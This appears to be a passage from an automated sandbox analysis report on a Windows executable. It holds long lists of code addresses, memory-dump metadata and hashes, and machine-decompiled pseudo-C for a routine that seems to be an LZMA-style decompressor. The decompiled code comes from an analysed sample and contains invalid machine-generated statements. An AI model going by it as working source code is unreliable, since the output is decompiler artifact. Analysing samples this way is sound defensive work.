                                                  0x00000000
                                                  0x00000000
                                                  0x004061d4
                                                  0x004061d4
                                                  0x004061d6
                                                  0x004061d9
                                                  0x0040624a
                                                  0x0040624a
                                                  0x0040624d
                                                  0x00406250
                                                  0x00406257
                                                  0x00406261
                                                  0x00000000
                                                  0x00406261
                                                  0x004061db
                                                  0x004061db
                                                  0x004061df
                                                  0x004061e2
                                                  0x004061e4
                                                  0x004061e7
                                                  0x004061ea
                                                  0x004061ec
                                                  0x004061ef
                                                  0x004061f1
                                                  0x004061f6
                                                  0x004061f9
                                                  0x004061fc
                                                  0x00406200
                                                  0x00406207
                                                  0x0040620a
                                                  0x00406211
                                                  0x00406215
                                                  0x0040621d
                                                  0x0040621d
                                                  0x0040621d
                                                  0x00406217
                                                  0x00406217
                                                  0x00406217
                                                  0x0040620c
                                                  0x0040620c
                                                  0x0040620c
                                                  0x00406221
                                                  0x00406224
                                                  0x00406242
                                                  0x00406242
                                                  0x00406244
                                                  0x00000000
                                                  0x00406226
                                                  0x00406226
                                                  0x00406226
                                                  0x00406229
                                                  0x0040622c
                                                  0x0040622f
                                                  0x00406231
                                                  0x00406231
                                                  0x00406231
                                                  0x00406234
                                                  0x00406237
                                                  0x00406239
                                                  0x0040623a
                                                  0x0040623d
                                                  0x00000000
                                                  0x0040623d
                                                  0x00000000
                                                  0x00406473
                                                  0x00406473
                                                  0x00406477
                                                  0x00406495
                                                  0x00406495
                                                  0x00406498
                                                  0x0040649f
                                                  0x004064a2
                                                  0x004064a5
                                                  0x004064a8
                                                  0x004064ab
                                                  0x004064ae
                                                  0x004064b0
                                                  0x004064b7
                                                  0x004064b8
                                                  0x004064ba
                                                  0x004064bd
                                                  0x004064c0
                                                  0x004064c3
                                                  0x004064c3
                                                  0x004064c8
                                                  0x00000000
                                                  0x004064c8
                                                  0x00406479
                                                  0x00406479
                                                  0x0040647c
                                                  0x0040647f
                                                  0x00406489
                                                  0x00000000
                                                  0x00000000
                                                  0x004064dd
                                                  0x004064dd
                                                  0x004064e1
                                                  0x00406504
                                                  0x00406507
                                                  0x0040650a
                                                  0x00406514
                                                  0x004064e3
                                                  0x004064e3
                                                  0x004064e6
                                                  0x004064e9
                                                  0x004064ec
                                                  0x004064f9
                                                  0x004064fc
                                                  0x004064fc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406520
                                                  0x00406520
                                                  0x00406524
                                                  0x00000000
                                                  0x00000000
                                                  0x0040652a
                                                  0x0040652a
                                                  0x0040652e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406534
                                                  0x00406534
                                                  0x00406536
                                                  0x0040653a
                                                  0x0040653a
                                                  0x0040653d
                                                  0x00406541
                                                  0x00000000
                                                  0x00000000
                                                  0x00406591
                                                  0x00406591
                                                  0x00406595
                                                  0x0040659c
                                                  0x0040659c
                                                  0x0040659f
                                                  0x004065a2
                                                  0x004065ac
                                                  0x00000000
                                                  0x004065ac
                                                  0x00406597
                                                  0x00406597
                                                  0x00000000
                                                  0x00000000
                                                  0x004065b8
                                                  0x004065b8
                                                  0x004065bc
                                                  0x004065c3
                                                  0x004065c6
                                                  0x004065c9
                                                  0x004065be
                                                  0x004065be
                                                  0x004065be
                                                  0x004065cc
                                                  0x004065cf
                                                  0x004065d2
                                                  0x004065d2
                                                  0x004065d5
                                                  0x004065d8
                                                  0x004065db
                                                  0x004065db
                                                  0x004065de
                                                  0x004065e5
                                                  0x004065ea
                                                  0x00000000
                                                  0x00000000
                                                  0x00406678
                                                  0x00406678
                                                  0x0040667c
                                                  0x00406a1a
                                                  0x00406a1a
                                                  0x00000000
                                                  0x00406a1a
                                                  0x00406682
                                                  0x00406682
                                                  0x00406685
                                                  0x00406688
                                                  0x0040668c
                                                  0x0040668f
                                                  0x00406695
                                                  0x00406697
                                                  0x00406697
                                                  0x00406697
                                                  0x0040669a
                                                  0x0040669d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040626d
                                                  0x0040626d
                                                  0x00406271
                                                  0x004069de
                                                  0x004069de
                                                  0x00000000
                                                  0x004069de
                                                  0x00406277
                                                  0x00406277
                                                  0x0040627a
                                                  0x0040627d
                                                  0x00406281
                                                  0x00406284
                                                  0x0040628a
                                                  0x0040628c
                                                  0x0040628c
                                                  0x0040628c
                                                  0x0040628f
                                                  0x00406292
                                                  0x00406292
                                                  0x00406295
                                                  0x00406298
                                                  0x00000000
                                                  0x00000000
                                                  0x0040629e
                                                  0x0040629e
                                                  0x004062a4
                                                  0x00000000
                                                  0x00000000
                                                  0x004062aa
                                                  0x004062aa
                                                  0x004062ae
                                                  0x004062b1
                                                  0x004062b4
                                                  0x004062b7
                                                  0x004062ba
                                                  0x004062bb
                                                  0x004062be
                                                  0x004062c0
                                                  0x004062c6
                                                  0x004062c9
                                                  0x004062cc
                                                  0x004062cf
                                                  0x004062d2
                                                  0x004062d5
                                                  0x004062d8
                                                  0x004062f4
                                                  0x004062f7
                                                  0x004062fa
                                                  0x004062fd
                                                  0x00406304
                                                  0x00406308
                                                  0x0040630a
                                                  0x0040630e
                                                  0x004062da
                                                  0x004062da
                                                  0x004062de
                                                  0x004062e6
                                                  0x004062eb
                                                  0x004062ed
                                                  0x004062ef
                                                  0x004062ef
                                                  0x00406311
                                                  0x00406318
                                                  0x0040631b
                                                  0x00000000
                                                  0x00406321
                                                  0x00406321
                                                  0x00000000
                                                  0x00406321
                                                  0x00000000
                                                  0x00406326
                                                  0x00406326
                                                  0x0040632a
                                                  0x004069ea
                                                  0x004069ea
                                                  0x00000000
                                                  0x004069ea
                                                  0x00406330
                                                  0x00406330
                                                  0x00406333
                                                  0x00406336
                                                  0x0040633a
                                                  0x0040633d
                                                  0x00406343
                                                  0x00406345
                                                  0x00406345
                                                  0x00406345
                                                  0x00406348
                                                  0x0040634b
                                                  0x0040634b
                                                  0x0040634b
                                                  0x00406351
                                                  0x00000000
                                                  0x00000000
                                                  0x00406353
                                                  0x00406353
                                                  0x00406356
                                                  0x00406359
                                                  0x0040635c
                                                  0x0040635f
                                                  0x00406362
                                                  0x00406365
                                                  0x00406368
                                                  0x0040636b
                                                  0x0040636e
                                                  0x00406371
                                                  0x00406389
                                                  0x0040638c
                                                  0x0040638f
                                                  0x00406392
                                                  0x00406392
                                                  0x00406395
                                                  0x00406399
                                                  0x0040639b
                                                  0x00406373
                                                  0x00406373
                                                  0x0040637b
                                                  0x00406380
                                                  0x00406382
                                                  0x00406384
                                                  0x00406384
                                                  0x0040639e
                                                  0x004063a5
                                                  0x004063a8
                                                  0x00000000
                                                  0x004063aa
                                                  0x004063aa
                                                  0x00000000
                                                  0x004063aa
                                                  0x004063a8
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x00000000
                                                  0x00000000
                                                  0x004063ea
                                                  0x004063ea
                                                  0x004063ee
                                                  0x004069f6
                                                  0x004069f6
                                                  0x00000000
                                                  0x004069f6
                                                  0x004063f4
                                                  0x004063f4
                                                  0x004063f7
                                                  0x004063fa
                                                  0x004063fe
                                                  0x00406401
                                                  0x00406407
                                                  0x00406409
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640c
                                                  0x0040640f
                                                  0x0040640f
                                                  0x00406415
                                                  0x004063b3
                                                  0x004063b3
                                                  0x004063b6
                                                  0x00000000
                                                  0x004063b6
                                                  0x00406417
                                                  0x00406417
                                                  0x0040641a
                                                  0x0040641d
                                                  0x00406420
                                                  0x00406423
                                                  0x00406426
                                                  0x00406429
                                                  0x0040642c
                                                  0x0040642f
                                                  0x00406432
                                                  0x00406435
                                                  0x0040644d
                                                  0x00406450
                                                  0x00406453
                                                  0x00406456
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645d
                                                  0x0040645f
                                                  0x00406437
                                                  0x00406437
                                                  0x0040643f
                                                  0x00406444
                                                  0x00406446
                                                  0x00406448
                                                  0x00406448
                                                  0x00406462
                                                  0x00406469
                                                  0x0040646c
                                                  0x00000000
                                                  0x0040646e
                                                  0x0040646e
                                                  0x00000000
                                                  0x0040646e
                                                  0x00000000
                                                  0x004066fb
                                                  0x004066fb
                                                  0x004066ff
                                                  0x00406a26
                                                  0x00406a26
                                                  0x00000000
                                                  0x00406a26
                                                  0x00406705
                                                  0x00406705
                                                  0x00406708
                                                  0x0040670b
                                                  0x0040670f
                                                  0x00406712
                                                  0x00406718
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671d
                                                  0x00000000
                                                  0x00000000
                                                  0x004064cb
                                                  0x004064cb
                                                  0x004064ce
                                                  0x00000000
                                                  0x00000000
                                                  0x0040680a
                                                  0x0040680a
                                                  0x0040680e
                                                  0x00406830
                                                  0x00406830
                                                  0x00406833
                                                  0x0040683d
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00406840
                                                  0x00406810
                                                  0x00406810
                                                  0x00406813
                                                  0x00406817
                                                  0x0040681a
                                                  0x0040681a
                                                  0x0040681d
                                                  0x00000000
                                                  0x00000000
                                                  0x004068c7
                                                  0x004068c7
                                                  0x004068cb
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068f0
                                                  0x004068f7
                                                  0x004068fe
                                                  0x004068fe
                                                  0x00406905
                                                  0x00406908
                                                  0x0040690f
                                                  0x00000000
                                                  0x00406912
                                                  0x004068cd
                                                  0x004068cd
                                                  0x004068d0
                                                  0x004068d3
                                                  0x004068d6
                                                  0x004068dd
                                                  0x00406821
                                                  0x00406821
                                                  0x00406824
                                                  0x00000000
                                                  0x00000000
                                                  0x004069b8
                                                  0x004069b8
                                                  0x004069bb
                                                  0x004068bc
                                                  0x004068bc
                                                  0x004068bc
                                                  0x00000000
                                                  0x004068c2
                                                  0x00000000
                                                  0x004065f2
                                                  0x004065f2
                                                  0x004065f4
                                                  0x004065fb
                                                  0x004065fc
                                                  0x004065fe
                                                  0x00406601
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406905
                                                  0x00406905
                                                  0x00406908
                                                  0x0040690f
                                                  0x00000000
                                                  0x00406912
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406637
                                                  0x00406637
                                                  0x0040663a
                                                  0x00406670
                                                  0x00406670
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a3
                                                  0x004067a3
                                                  0x004067a6
                                                  0x004067a8
                                                  0x00406a32
                                                  0x00406a32
                                                  0x00000000
                                                  0x00406a32
                                                  0x004067ae
                                                  0x004067ae
                                                  0x004067b1
                                                  0x00000000
                                                  0x00000000
                                                  0x004067b7
                                                  0x004067b7
                                                  0x004067bb
                                                  0x004067be
                                                  0x004067be
                                                  0x004067be
                                                  0x00000000
                                                  0x004067be
                                                  0x0040663c
                                                  0x0040663c
                                                  0x0040663e
                                                  0x00406640
                                                  0x00406642
                                                  0x00406645
                                                  0x00406646
                                                  0x00406648
                                                  0x0040664a
                                                  0x0040664d
                                                  0x00406650
                                                  0x00406666
                                                  0x00406666
                                                  0x0040666b
                                                  0x004066a3
                                                  0x004066a3
                                                  0x004066a7
                                                  0x004066d0
                                                  0x004066d3
                                                  0x004066d5
                                                  0x004066dc
                                                  0x004066df
                                                  0x004066e2
                                                  0x004066e2
                                                  0x004066e7
                                                  0x004066e7
                                                  0x004066e9
                                                  0x004066ec
                                                  0x004066f3
                                                  0x004066f6
                                                  0x00406723
                                                  0x00406723
                                                  0x00406726
                                                  0x00406729
                                                  0x0040679d
                                                  0x0040679d
                                                  0x0040679d
                                                  0x0040679d
                                                  0x00000000
                                                  0x0040679d
                                                  0x0040672b
                                                  0x0040672b
                                                  0x00406731
                                                  0x00406734
                                                  0x00406737
                                                  0x0040673a
                                                  0x0040673d
                                                  0x00406740
                                                  0x00406743
                                                  0x00406746
                                                  0x00406749
                                                  0x0040674c
                                                  0x00406765
                                                  0x00406767
                                                  0x0040676a
                                                  0x0040676b
                                                  0x0040676e
                                                  0x00406770
                                                  0x00406773
                                                  0x00406775
                                                  0x00406777
                                                  0x0040677a
                                                  0x0040677c
                                                  0x0040677f
                                                  0x00406783
                                                  0x00406785
                                                  0x00406785
                                                  0x00406786
                                                  0x00406789
                                                  0x0040678c
                                                  0x0040674e
                                                  0x0040674e
                                                  0x00406756
                                                  0x0040675b
                                                  0x0040675d
                                                  0x00406760
                                                  0x00406760
                                                  0x0040678f
                                                  0x00406796
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00000000
                                                  0x00406798
                                                  0x00406798
                                                  0x00000000
                                                  0x00406798
                                                  0x00406796
                                                  0x004066a9
                                                  0x004066a9
                                                  0x004066ac
                                                  0x004066ae
                                                  0x004066b1
                                                  0x004066b4
                                                  0x004066b7
                                                  0x004066b9
                                                  0x004066bc
                                                  0x004066bf
                                                  0x004066bf
                                                  0x004066c2
                                                  0x004066c2
                                                  0x004066c5
                                                  0x004066cc
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x00000000
                                                  0x004066ce
                                                  0x004066ce
                                                  0x00000000
                                                  0x004066ce
                                                  0x004066cc
                                                  0x00406652
                                                  0x00406652
                                                  0x00406655
                                                  0x00406657
                                                  0x0040665a
                                                  0x00000000
                                                  0x00000000
                                                  0x004063b9
                                                  0x004063b9
                                                  0x004063bd
                                                  0x00406a02
                                                  0x00406a02
                                                  0x00000000
                                                  0x00406a02
                                                  0x004063c3
                                                  0x004063c3
                                                  0x004063c6
                                                  0x004063c9
                                                  0x004063cc
                                                  0x004063cf
                                                  0x004063d2
                                                  0x004063d5
                                                  0x004063d7
                                                  0x004063da
                                                  0x004063dd
                                                  0x004063e0
                                                  0x004063e2
                                                  0x004063e2
                                                  0x004063e2
                                                  0x00000000
                                                  0x00000000
                                                  0x00406544
                                                  0x00406544
                                                  0x00406548
                                                  0x00406a0e
                                                  0x00406a0e
                                                  0x00000000
                                                  0x00406a0e
                                                  0x0040654e
                                                  0x0040654e
                                                  0x00406551
                                                  0x00406554
                                                  0x00406557
                                                  0x00406559
                                                  0x00406559
                                                  0x00406559
                                                  0x0040655c
                                                  0x0040655f
                                                  0x00406562
                                                  0x00406565
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656c
                                                  0x0040656e
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406571
                                                  0x00406574
                                                  0x00406577
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657d
                                                  0x0040657f
                                                  0x0040657f
                                                  0x00000000
                                                  0x00000000
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c5
                                                  0x00000000
                                                  0x00000000
                                                  0x004067cb
                                                  0x004067cb
                                                  0x004067ce
                                                  0x004067d1
                                                  0x004067d4
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d9
                                                  0x004067dc
                                                  0x004067df
                                                  0x004067e2
                                                  0x004067e5
                                                  0x004067e8
                                                  0x004067e9
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067ee
                                                  0x004067f1
                                                  0x004067f4
                                                  0x004067f7
                                                  0x004067fa
                                                  0x004067fe
                                                  0x00406800
                                                  0x00406803
                                                  0x00000000
                                                  0x00406805
                                                  0x00406805
                                                  0x00406582
                                                  0x00406582
                                                  0x00000000
                                                  0x00406582
                                                  0x00406803
                                                  0x00406a38
                                                  0x00406a38
                                                  0x00000000
                                                  0x00000000
                                                  0x00406067
                                                  0x00406a6f
                                                  0x00406a6f
                                                  0x00000000
                                                  0x00406a6f
                                                  0x004068bc
                                                  0x0040693c
                                                  0x00406905

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                                                  • Instruction ID: 2446724231f05ea51107c8768389afa7e2a62b3a86e3c0cdb9b17195a5c17046
                                                  • Opcode Fuzzy Hash: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                                                  • Instruction Fuzzy Hash: E9A14F71E00228CFDB28CFA8C8547ADBBB1FB45305F21816AD956BB281D7785A96CF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040680A, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E0040680A() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
